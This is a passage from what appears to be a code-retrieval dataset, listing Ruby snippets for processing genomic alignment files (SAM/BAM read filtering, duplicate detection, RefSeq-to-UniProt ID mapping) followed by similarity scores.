"def read_summary(fname)\n hash={}\n # Read file\n File.open(fname,'r') do |f|\n # Loop over line\n f.each_line do |line|\n line.chomp!\n index,content = line.split(/\\s*==\\s*/)\n hash[index] = content # index:id, content:path\n end\n end\n return hash\nend",
"def parse_to_file(outdir)\n z_unique = File.new(outdir+\"_unique\", 'w')\n z_non_unique = File.new(outdir+\"_non_unique\", 'w')\n entries = []\n while !@filehandler.eof?\n entry1 = make_entry()\n line = @filehandler.readline()\n entry2 = make_entry()\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n # same chrosome?\n if entry1.t_name == entry2.t_name\n entries << entry2\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = true\n end\n else\n marker2 = false\n @counter_non_unique += 1\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n while entry1.q_name == entry2.q_name\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = 1\n end\n end\n end\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n end\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n z_non_unique.close\n z_unique.close\n end",
"def catkey_report_rows\n constituent_info_with_catkeys = constituent_info.select { |_druid, info_hash| info_hash[:catkeys].present? }\n constituent_info_with_catkeys.map do |druid, info_hash|\n info_hash[:catkeys].map { |catalog_link| [druid, catalog_link['catalogRecordId']] }.flatten\n end\n end",
"def iterate_unique_views\n identify_unique_views_parsed_file.each do |u|\n unique_file_path_array << u[0]\n end\n unique_file_path_array\n end",
"def mapped_id(partial_id)\n globs = dir_glob(partial_id)\n if globs.size == 1\n IO.read(globs[0])\n else\n partial_id\n end\n end",
"def uniq!\n im = Rubinius::IdentityMap.from self\n return if im.size == size\n\n Rubinius.check_frozen\n\n array = im.to_array\n @tuple = array.tuple\n @start = array.start\n @total = array.total\n\n self\n end"
] |
[
"0.6373402",
"0.6143493",
"0.59263504",
"0.57691497",
"0.5676399",
"0.5657573",
"0.5556849",
"0.5538333",
"0.55204505",
"0.5498366",
"0.5496701",
"0.5448031",
"0.53502053",
"0.5329921",
"0.52846646",
"0.52826154",
"0.5208021",
"0.5208021",
"0.51964045",
"0.51787305",
"0.51546603",
"0.51320237",
"0.5117705",
"0.51173085",
"0.5101994",
"0.5096823",
"0.50823975",
"0.507375",
"0.50729245",
"0.5072525",
"0.5068136",
"0.5067115",
"0.5065262",
"0.50555557",
"0.5051112",
"0.50465167",
"0.5038522",
"0.5034716",
"0.5032274",
"0.5015474",
"0.5015474",
"0.5008573",
"0.49893233",
"0.4988839",
"0.4986537",
"0.49853837",
"0.49798298",
"0.49729487",
"0.49703315",
"0.49684098",
"0.49583322",
"0.49518734",
"0.4942803",
"0.49416757",
"0.4935645",
"0.49329048",
"0.49287948",
"0.492612",
"0.49221173",
"0.49201623",
"0.49191543",
"0.4916283",
"0.4905833",
"0.4903921",
"0.49020323",
"0.49017152",
"0.4894644",
"0.48931777",
"0.48871693",
"0.4885407",
"0.4881431",
"0.4877256",
"0.48754314",
"0.48707625",
"0.48689952",
"0.48651958",
"0.48651958",
"0.4864812",
"0.4863872",
"0.4856134",
"0.48536634",
"0.4845419",
"0.48420474",
"0.48419937",
"0.48352605",
"0.48329383",
"0.48298278",
"0.4829586",
"0.48294976",
"0.48283803",
"0.48265648",
"0.48247045",
"0.482119",
"0.4814938",
"0.4810638",
"0.47994223",
"0.47940606",
"0.47931296",
"0.47884694",
"0.47857955"
] |
0.740286
|
0
|
Extracts uniquely mapping reads with i mismatches; mis: number of mismatches
|
def extract_uni_err(mis)
  # Seed the per-mismatch output SAM with the header of the sorted
  # unique-mapper BAM.
  run_cmd(
    "samtools view -H #{@names.get('mapped_uniqsort')} " \
    "> #{@names.get('mapped_uni', mis)}"
  )
  # Keep only records whose edit-distance tag (NM:i:<mis>, or nM:i:<mis> as
  # written by some aligners) equals the requested mismatch count. The
  # trailing ([[:space:]]|$) stops e.g. NM:i:1 from also matching NM:i:10,
  # and the (^@) branch keeps header lines so samtools can parse the stream;
  # `samtools view -S -` then emits the records headerless for appending.
  run_cmd(
    "samtools view -h #{@names.get('mapped_uniqsort')} " \
    "| grep -E '([nN]M:i:#{mis}([[:space:]]|$))|(^@)' " \
    '| samtools view -S - ' \
    ">> #{@names.get('mapped_uni', mis)}"
  )
end
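
A minimal usage sketch, assuming it runs inside the same class that defines extract_uni_err, the @names file-name helper, and the run_cmd shell wrapper; the 0..2 mismatch range is purely illustrative.

# Hypothetical driver: write one filtered SAM per mismatch count.
(0..2).each do |mis|
  extract_uni_err(mis)
  puts "wrote #{@names.get('mapped_uni', mis)}"
end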
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def extract_uni\n # Extract all uniquely mapping reads\n run_cmd(\n \"samtools view -H #{@names.get('mapped_merged')} \" \\\n \"> #{@names.get('mapped_uniq')}\"\n )\n run_cmd(\n \"samtools view -h #{@names.get('mapped_merged')} \" \\\n \"| grep -P 'NH:i:1(\\t|$)' \" \\\n \">> #{@names.get('mapped_uniq')}\"\n )\n run_cmd(\n \"samtools sort -o #{@names.get('mapped_uniqsort')} -O bam -T \" \\\n \"tmp.bam #{@names.get('mapped_uniq')}\"\n )\n end",
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def check_matchness(aa_sequence_hash,nt_sequence_hash)\n missing_nt_sequence = Array.new\n aa_sequence_hash.each do |defi, seq|\n if nt_sequence_hash[defi].nil? \n # miss that stuff\n missing_nt_sequence << defi\n end\n end\n\n missing_aa_sequence = Array.new\n nt_sequence_hash.each do |defi, seq|\n if aa_sequence_hash[defi].nil?\n missing_aa_sequence << defi\n end\n end\n\n\n return missing_aa_sequence, missing_nt_sequence\n end",
"def hash_mm_selreads(cigarstring, selread)\n\t\thash = Hash.new {|h,k| h[k] = {} }\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\thash[cigar.read_id] = [cigar.data, cigar.pos].join(\"\\t\")\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn hash, count.to_i\n\tend",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def check_duplication (n=10)\n\n # get the first n hits\n less_hits = @hits[0..[n-1,@hits.length].min]\n averages = []\n\n less_hits.each do |hit|\n # indexing in blast starts from 1\n start_match_interval = hit.hsp_list.each.map{|x| x.hit_from}.min - 1\n end_match_interval = hit.hsp_list.map{|x| x.hit_to}.max - 1\n \n #puts \"#{hit.xml_length} #{start_match_interval} #{end_match_interval}\" \n\n coverage = Array.new(hit.xml_length,0)\n hit.hsp_list.each do |hsp|\n aux = []\n # for each hsp\n # iterate through the alignment and count the matching residues\n [*(0 .. hsp.align_len-1)].each do |i|\n residue_hit = hsp.hit_alignment[i]\n residue_query = hsp.query_alignment[i]\n if residue_hit != ' ' and residue_hit != '+' and residue_hit != '-'\n if residue_hit == residue_query \n idx = i + (hsp.hit_from-1) - hsp.hit_alignment[0..i].scan(/-/).length \n aux.push(idx)\n #puts \"#{idx} #{i} #{hsp.hit_alignment[0..i].scan(/-/).length}\"\n # indexing in blast starts from 1\n coverage[idx] += 1\n end\n end\n end\n end\n overlap = coverage.reject{|x| x==0}\n averages.push(overlap.inject(:+)/(overlap.length + 0.0))\n end\n \n # if all hsps match only one time\n if averages.reject{|x| x==1} == []\n return [\"NO\",1]\n end\n\n R.eval(\"library(preprocessCore)\")\n\n #make the wilcox-test and get the p-value\n R.eval(\"coverageDistrib = c#{averages.to_s.gsub('[','(').gsub(']',')')}\")\n R. eval(\"pval = wilcox.test(coverageDistrib - 1)$p.value\")\n pval = R.pull \"pval\"\n\n if pval < 0.01\n status = \"YES\"\n else\n status = \"NO\"\n end\n return [status, pval]\n end",
"def mappa_e_rimuovi_duplicati(&block)\n self.map.with_index(&block).uniq\n end",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def hash_selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\t\t\t\t\t\t\t# read id is key and cigar is value\n\t\t\t\t\tselread[saminfo[0]][:seq] = [saminfo[3], saminfo[9]].join(\"\\t\")\t# read id is key and alignment position & read sequence is value\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
"def mm_allreads(cigarstring, samread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif samread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif samread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif samread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def read_mrp\n $MRP_FILE = $PRJ_NAME + \"_map.mrp\"\n f = open($MRP_FILE,\"r\")\n while line = f.gets\n if /ERROR/ =~ line\n /LOC=(.*)\\)/ =~ line # pick up Slice name\n $ERROR_SLICE << $1\n end\n end\n f.close\n $ERROR_SLICE.uniq!\nend",
"def map_tgup_by_geneid()\n Dir.glob(\"#{$prepare_dir}/refg/*.dat\") do |input_file|\n refseq_gene_list = []\n gene_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"gene_id prefix: #{gene_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n up_list = load_up_refg(gene_id_prefix) # get same prefix data from UniProt\n refseq_gene_list.each do |refseq_data|\n match = false\n unless up_list.nil? # exist prefix list on UniProt\n match_list = up_list[refseq_data[:gene_id]]\n unless match_list.nil?\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid]\n output_idmap(refseq_data, up_info[:upid])\n match = true\n end\n end\n end\n end\n if match == false\n $no_up += 1\n end\n end\n end\nend",
"def duplicate_imports_info\n import_frequency_mapping = {}\n all_imports.uniq.each do |item|\n item_occurrence = all_imports.count(item)\n if item_occurrence > 1\n import_frequency_mapping[item.chomp] = item_occurrence\n end\n end\n import_frequency_mapping\n end",
"def km_get_reacid(data)\n return data.map{|d| d.scan(/(?<r>R\\d{5})/)}.flatten.sort\nend",
"def find_errors(data)\n keys = Hash.new(0)\n columns = [data.chron_column, data.dimension_columns].flatten.compact\n allkeys = columns.map{|col| col.values}.transpose\n allkeys.each {|keylist| keys[keylist] += 1}\n duplicates = []\n keys.each_pair do |key, count|\n duplicates << key if count > 1\n end\n duplicates.each do |dup|\n @errors << \"Duplicate entry in source for (#{dup.map {|key| key.to_s}.join(', ')})\"\n end\n end",
"def identify_duplicate_sequences sequences\n sequences.select { |e| sequences.count(e) > 1 }.uniq\n end",
"def dupe_indices(array)\n #ht = Hash.new {|h,k| h[k]=[]}\n #ht[\"cats\"] << \"Jellicle\"\n #ht[\"cats\"] << \"Mr. Mistoffelees\"\n hash = Hash.new { |h,k| h[k]=[] }\n array.each_with_index do |char, i|\n hash[char] << i\n end\n \n # puts \"Hash b select form : #{b.select{|key, value| value < 200}}\\n\\n\n hash.select{ |k,v| v.length > 1}\n\n\nend",
"def uniq(networkcheckoutput)\n mash = Hashie::Mash.new networkcheckoutput\n #networkcheckoutput.hits.hits.each do |value|\n\n #this creates a dataset of unique values based on a specified field. Need to break the Date out of the timestamp field to use.\n seen = Set.new\n mash.hits.hits.inject([]) do |kept, record|\n\n\n #brokenfield = record._source.src_ip.match(/\\w++ [^_]\\w/)\n\n unless seen.include?(record._source.src_ip)\n kept << record\n seen << record._source.src_ip\n end\n kept\n end\n end",
"def parse_to_file(line)\n\n z_unique = File.new(@outdir+\"_unique\", 'w')\n z_non_unique = File.new(@outdir+\"_non_unique\", 'w')\n\n while !@filehandler.eof?\n entry1 = make_content(line)\n line = @filehandler.readline()\n entry2 = make_content(line)\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n\n if entry1.t_name == entry2.t_name\n\n entries << entry2\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n\n else\n marker2 = false\n\n @counter_non_unique += 1\n\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n while entry1.qname == entry2.qname\n\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n end\n\n end\n\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n\n\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n puts \"Unique: #{@counter_unique} Non_unique: #{@counter_non_unique}\"\n z_non_unique.close\n z_unique.close\n end",
"def mots_uniques\n @mots_uniques ||= begin\n self.select do |mot_min, arr_indexes|\n arr_indexes.count == 1\n end.keys\n end\n end",
"def identify_unique_views_parsed_file\n parsed_file.select { |v| parsed_file.count(v) > 1 }.uniq\n end",
"def read_singletons(singletons, read_length)\n\t\tsingle_reads = {}\n\t\t\n\t\tFile.open(singletons, 'r').readlines.each do |line|\n \n \t\tline = line.strip.split(/\\s+/)\n \t\tqname, flag, chr, start = line[0..3] \t\n \t\tflag.to_i & 0x10 > 0 ? strand = -1 : strand = 1\n \t\tcigar = line[5]\n\t\t\tdistance = genomic_mappinglength(cigar, read_length)\n\t\t\t\n\t\t\tif distance != false\n\t\t\t\tstrand == 1 ? stop = start + distance : stop = start - distance\n\t\t\t\tsingle_reads[qname] = [chr, start, stop, strand]\n\t\t\tend\n\t\tend\n\t\tsingle_reads\n\tend",
"def count_duplicate_matches(matches)\n matches.map { |match| matches_hash[Set.new match] }.reduce(0, :+)\n end",
"def split_exact_dups(dups_hash)\n dups_hash.partition { |_id, docs| docs.map(&:to_hash).uniq.size == 1 }\n end",
"def parse_to_file(outdir)\n z_unique = File.new(outdir+\"_unique\", 'w')\n z_non_unique = File.new(outdir+\"_non_unique\", 'w')\n entries = []\n while !@filehandler.eof?\n entry1 = make_entry()\n line = @filehandler.readline()\n entry2 = make_entry()\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n # same chrosome?\n if entry1.t_name == entry2.t_name\n entries << entry2\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = true\n end\n else\n marker2 = false\n @counter_non_unique += 1\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n while entry1.q_name == entry2.q_name\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = 1\n end\n end\n end\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n end\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n z_non_unique.close\n z_unique.close\n end",
"def duplicate_ids\n return [] if accession_number.nil?\n Image.where(accession_number_ssim: @accession_number)\n end",
"def processdup_all(c)\n prev_base = nil\n show = false\n c.each do |l|\n base = get_base(l[:file])\n if prev_base && base != prev_base\n show = true\n break\n end\n prev_base = base\n end\n if show\n c.each do |l|\n puts \"#{get_file(l[:file])} similarity #{l[:count]}\"\n end\n puts \"\"\n end\nend",
"def filter_similar_pid(cutoff = 10)\n seq = self.dna_hash.dup\n uni_seq = seq.values.uniq\n uni_seq_pid = {}\n uni_seq.each do |k|\n seq.each do |name,s|\n name = name[1..-1]\n if k == s\n if uni_seq_pid[k]\n uni_seq_pid[k] << [name.split(\"_\")[0],name.split(\"_\")[1]]\n else\n uni_seq_pid[k] = []\n uni_seq_pid[k] << [name.split(\"_\")[0],name.split(\"_\")[1]]\n end\n end\n end\n end\n\n dup_pid = []\n uni_seq_pid.values.each do |v|\n next if v.size == 1\n pid_hash = Hash[v]\n list = pid_hash.keys\n list2 = Array.new(list)\n pairs = []\n\n list.each do |k|\n list2.delete(k)\n list2.each do |k1|\n pairs << [k,k1]\n end\n end\n\n pairs.each do |p|\n pid1 = p[0]\n pid2 = p[1]\n if pid1.compare_with(pid2) <= 1\n n1 = pid_hash[pid1].to_i\n n2 = pid_hash[pid2].to_i\n if n1 >= cutoff * n2\n dup_pid << pid2\n elsif n2 >= cutoff * n1\n dup_pid << pid1\n end\n end\n end\n end\n\n new_seq = {}\n seq.each do |name,s|\n pid = name.split(\"_\")[0][1..-1]\n unless dup_pid.include?(pid)\n new_seq[name] = s\n end\n end\n self.sub(new_seq.keys)\n end",
"def match_assembly\n @assembly_map = {}\n lines.each { |lno, assems|\n assems.each { |assem|\n if @assembly_map[assem].nil? then\n @assembly_map[assem] = [lno]\n else \n @assembly_map[assem] << lno\n end\n }\n \n }\n end",
"def hashNQS()\n @hash_nqs={}\n nqsReader=File.open(@nqsFile,\"r\")\n nqsReader.each do |line|\n cols=line.split(/\\s+/)\n \n name=cols[0]\n next if name==\"readName\"\n length=cols[1]\n dist=cols[2]\n qual=cols[3].to_i\n pass=cols[4]\n \n str_result=length+'.'+pass\n str=name+'.'+dist\n if @hash_nqs[str]==nil\n @hash_nqs[str]=str_result\n end\n end\n nqsReader.close\n $stderr.puts @hash_nqs.size\nend",
"def compare_all_rows\n @guess_rows.map do |guess|\n right_color = 0 \n right_spot = 0\n guess.get_pins.each.with_index do |pin, index|\n if pin == @correct_row.get_pins[index]\n right_spot += 1\n end\n end\n right_color = (guess.get_pins & @correct_row.get_pins).count\n [right_spot, right_color - right_spot, guess]\n end\n end",
"def uniq!\n im = Rubinius::IdentityMap.from self\n return if im.size == size\n\n Rubinius.check_frozen\n\n array = im.to_array\n @tuple = array.tuple\n @start = array.start\n @total = array.total\n\n self\n end",
"def selectreads(samstring, samread, data, bamfile)\n\t\tselread = Hash.new {|h,k| h[k] = {} }\n\t\treadcount = 0;\n\t\tsamstring.split(\"\\n\").each do |string|\n\t\t\tsaminfo = string.split(\"\\t\")\n\t\t\tif samread.key?(saminfo[0]) == true\n\t\t\t\tterm = [saminfo[0], saminfo[1], saminfo[3]].join(\"_\")\n\t\t\t\tif data[bamfile].key?(term.to_s) == true\n\t\t\t\t\treadcount += 1\n\t\t\t\t\tselread[saminfo[0]][:cigar] = saminfo[5]\n\t\t\t\t\tselread[saminfo[0]][:bwapos] = saminfo[3]\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn selread, readcount\n\tend",
